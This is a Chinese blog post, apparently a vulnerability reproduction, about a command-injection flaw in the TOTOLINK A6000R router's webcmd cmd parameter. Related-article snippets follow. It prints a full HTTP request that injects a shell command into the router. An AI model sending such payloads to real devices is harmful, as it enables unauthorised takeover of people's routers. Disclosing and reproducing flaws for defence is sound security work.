漏洞复现-路由器TOTOLINK-A6000R-RCE

于 2024-07-29 09:45:13 发布
阅读量292 收藏 3
点赞数 7
分类专栏: 漏洞复现~ 文章标签: 网络安全 物联网 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wuwenshequ/article/details/140763141
版权

本文来自无问社区,更多漏洞信息可前往查看icon-default.png?t=N7T8http://wwlib.cn/index.php/artread/artid/14996.html

0x01 产品简介

TOTOLINK A6000R是一款性能卓越的无线路由器,采用先进的技术和设计,为用户提供出色的网络体验。其支持最新的Wi-Fi标准,可实现高速稳定的无线连接,适用于各种网络需求,包括流畅的高清视频流、快速的在线游戏和大规模文件传输。双频段支持让用户可以根据需求选择最佳的无线信号频段,确保网络稳定性和速度。

0x02 漏洞概述

此设备中的webcmd函数中存在命令注入漏洞,攻击者可以通过webcmd 函数中的cmd参数包含命令,进行命令执行攻击。

0x03 复现环境

payload:

GET /cgi-bin/luci/admin/mtk/webcmd?cmd=ls%20/>/www/555.txt HTTP/1.1
Host: 192.168.187.136
Connection: close
Cache-Control: max-age=0
sec-ch-ua: "Not/A)Brand";v="8", "Chromium";v="126", "Google Chrome";v="126"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: sysauth=80c79bd6ad9bfba9656b7a8bee2a988f

图片

效果图:

图片

无问社区
关注
  • 7
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
TOTOLink T6路由器漏洞复现
PMJ的博客
01-11 6645
TOTOLink T6路由器漏洞复现 来源:xman夏令营 产品描述 产品介绍:价格不用两张的无线路由器 分为子母路由器,如果是子路由器,需要找到登录ip,恢复出厂设置 漏洞描述 该设备可直接开启telnet功能;且mqtt协议处未对订阅者进行认证处理,且命令执行前未做判断和过滤,所以存在远程命令执行漏洞 开启Telnet 对固件解压分析:发现web_cste下有telnet.html,访问发现telnet服务 开启后尝试连接,需要密码 且burp抓包重发,发现没有cookie也是可以开启的 到固件
totolink路由器虚拟服务器,不怕没信号 TOTOLINK-N350R路由器任你用
weixin_32638607的博客
08-10 419
拥有同类产品的5倍信号,信号王非TOTOLINK-N350R莫属。亚太区中高端无线路由第一品牌TOTOLINK,在韩国市场占有率达82.3%。N350R采用11N技术,无线传输速率最高可达300Mbps。提供更高的无线带宽,使局域网内的数据传输更加高效,减少信号堵塞及网络延时,语音视频,在线点播和网络游戏都更加的流畅。同时集路由器、AP、交换机、防火墙功能于一体,是一款大面积覆盖专用无线产品。N3...
CVE-2024-0569复现及IDS snort防御
2401_82670286的博客
01-29 478
发现了一个被归类为有问题的漏洞,该漏洞存在于Totolink T8 4.1.5cu.833_20220905版本中。该漏洞影响了文件/cgi-bin/cstecgi.cgi中Setting Handler组件的getSysStatusCfg功能。对参数ssid/key的操纵导致信息泄露。攻击者可以远程发起攻击。该漏洞已经公开披露并可能被滥用。升级到版本4.1.5cu.862_B20230228可以解决此问题。建议升级受影响的组件。该漏洞被分配了识别号VDB-250785。
无胁科技-TVD每日漏洞情报-2022-10-8
wuthreat无胁科技的博客
10-09 640
参考链接:https://tvd.wuthreat.com/#/listDetail?参考链接:https://tvd.wuthreat.com/#/listDetail?参考链接:https://tvd.wuthreat.com/#/listDetail?参考链接:https://tvd.wuthreat.com/#/listDetail?参考链接:https://tvd.wuthreat.com/#/listDetail?漏洞编号:CVE-2022-41352;漏洞编号:CVE-2022-40475;
无胁科技-TVD每日漏洞情报-2022-7-29
wuthreat无胁科技的博客
07-29 545
漏洞名称:万户OA前台无条件GETSHELL 漏洞级别:无 漏洞编号:无 相关涉及:万户OA 漏洞状态:POC 参考链接:https://tvd.wuthreat.com/#/listDetail?TVD_ID=TVD-2022-15480漏洞名称:用友U8-OA企业版存在SQL注入漏洞(CNVD-2022-31182) 漏洞级别:无 漏洞编号:CNVD-2022-31182 相关涉及:用友网络科技股份有限公司 用友U8-OA企业版 2.83 漏洞状态:在野 参考链接:https://tvd.wuthrea
华为路由器CVE-2017-17215-HG532
PMJ的博客
01-22 5852
华为路由器CVE-2017-17215-HG532 漏洞描述 官方 该远程命令执行漏洞是位于UPnP服务中的,该设备支持名为DeviceUpgrade的一种服务类型 设备可以通过这种服务更新固件,具体过程是向“/ctrlt/DeviceUpgrade_1”这个地址提交请求,请求中包含NewStatusURL及NewDownloadURL两个元素。远程管理员可以通过该漏洞在设备上执行任意命令 将shell元字符 注入NewStatusURL以及NewDownloadURL元素中。 分析漏洞 下载固件: ht
无胁科技-TVD每日漏洞情报-2022-8-5
wuthreat无胁科技的博客
08-05 409
参考链接:https://tvd.wuthreat.com/#/listDetail?参考链接:https://tvd.wuthreat.com/#/listDetail?参考链接:https://tvd.wuthreat.com/#/listDetail?参考链接:https://tvd.wuthreat.com/#/listDetail?参考链接:https://tvd.wuthreat.com/#/listDetail?漏洞编号:CVE-2022-28913;漏洞编号:CVE-2022-29321;.
无胁科技-TVD每日漏洞情报-2022-11-29
wuthreat无胁科技的博客
11-29 476
参考链接:https://tvd.wuthreat.com/#/listDetail?参考链接:https://tvd.wuthreat.com/#/listDetail?参考链接:https://tvd.wuthreat.com/#/listDetail?参考链接:https://tvd.wuthreat.com/#/listDetail?参考链接:https://tvd.wuthreat.com/#/listDetail?漏洞编号:CVE-2022-45884。漏洞编号:CVE-2022-0698。
无胁科技-TVD每日漏洞情报-2022-9-19
wuthreat无胁科技的博客
09-19 195
参考链接:https://tvd.wuthreat.com/#/listDetail?参考链接:https://tvd.wuthreat.com/#/listDetail?参考链接:https://tvd.wuthreat.com/#/listDetail?参考链接:https://tvd.wuthreat.com/#/listDetail?参考链接:https://tvd.wuthreat.com/#/listDetail?漏洞编号:CVE-2022-27668;漏洞编号:CVE-2022-40139;
无线路由TOTOLink-N150R最稳定固件包
12-21
标题中的“无线路由TOTOLink-N150R最稳定固件包”指的是TOTOLink N150R型号的无线路由器的一个特定固件版本,该版本被广大用户认为是最稳定的。固件是路由器的操作系统,它控制着路由器的所有功能,包括网络连接、...
TOTOLINK N650R无线路由器设置详细图文教程
10-01
TOTOLINK N650R无线路由器设置详解】 TOTOLINK N650R是一款高性能的无线路由器,适用于家庭和小型办公室环境。本教程旨在帮助用户顺利地完成该路由器的安装与配置,以实现宽带连接和无线网络的正常运作。 ### 第...
TOTOLINK-N350RP固件V5.2.C
12-08
TOTOLINK-N350RP固件V5.2.C是一款专为TOTOLINK N350RP无线路由器设计的软件更新程序。固件是控制路由器硬件运行的软件,它包含网络协议、设备配置、安全功能等多个方面的代码。在这款固件版本中,我们看到的是V5.2.C...
TOTOLINK N600R V2路由器设置教程(图文)
10-01
本文介绍了TOTOLINK N600RV2路由器的安装、上网设置、WiFi密码和名称设置等内容。部分用户在参考说明书,仍然不能够完成N600RV2路由器的上网设置,...因此,本文会对TOTOLINK N600RV2路由器的安装、设置进行详细的介绍
TOTOLINK-SoftAC无线AP管理工具 TOTOLINK AP设置工具
02-06
10. **网络知识**:理解基本的网络概念和原理,如子网掩码、DNS设置、路由器配置等,是使用TOTOLINK SoftAC的前提。用户需要具备一定的网络基础知识才能有效利用该工具。 总的来说,TOTOLINK SoftAC是针对无线AP...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8353
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
物联网在电力行业的应用
专研计算机网络,数据通信,网络安全,系统集成
07-22 1048
物联网(IoT)在电力行业中的应用不仅仅限于智能电表和设备监控,还包括智能电网、能耗管理、预测性维护、电力负载预测等。本文将深入探讨这些应用,并提供更详细的代码示例来展示如何实现这些应用。
会Excel就会sql
svygh123的专栏
07-20 1392
以上就是通过具体的例子来说明Excel中对应的操作,以便更好地对比SQL,通过这些步骤,你可以直观地在Excel中实现类似数据库操作的功能,SQL就像是数据库世界的Excel,但它更加强大,适用于大规模数据处理和复杂的数据关系管理。虽然开始时可能会觉得SQL语法有些抽象,但一旦掌握了基础,你会发现它非常高效且强大,特别是在处理大量数据和执行复杂查询时。就像在Excel中一样,实践中学习SQL会更加有效,尝试编写一些简单的查询,逐渐增加难度,你会很快上手的!
leetcode 1555 银行账号概要(postgresql)
最新发布
weixin_51696882的博客
07-25 1099
力扣银行 (LCB) 帮助程序员们完成虚拟支付。我们的银行在表 Transaction 中记录每条交易信息,我们要查询每个用户的当前余额,并检查他们是否已透支(当前额度小于 0)。 写一条 SQL 语句,查询: user_id 用户 ID user_name 用户名 credit 完成交易后的余额 credit_limit_breached 检查是否透支 ("Yes" 或 "No") 以任意顺序返回结果表
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值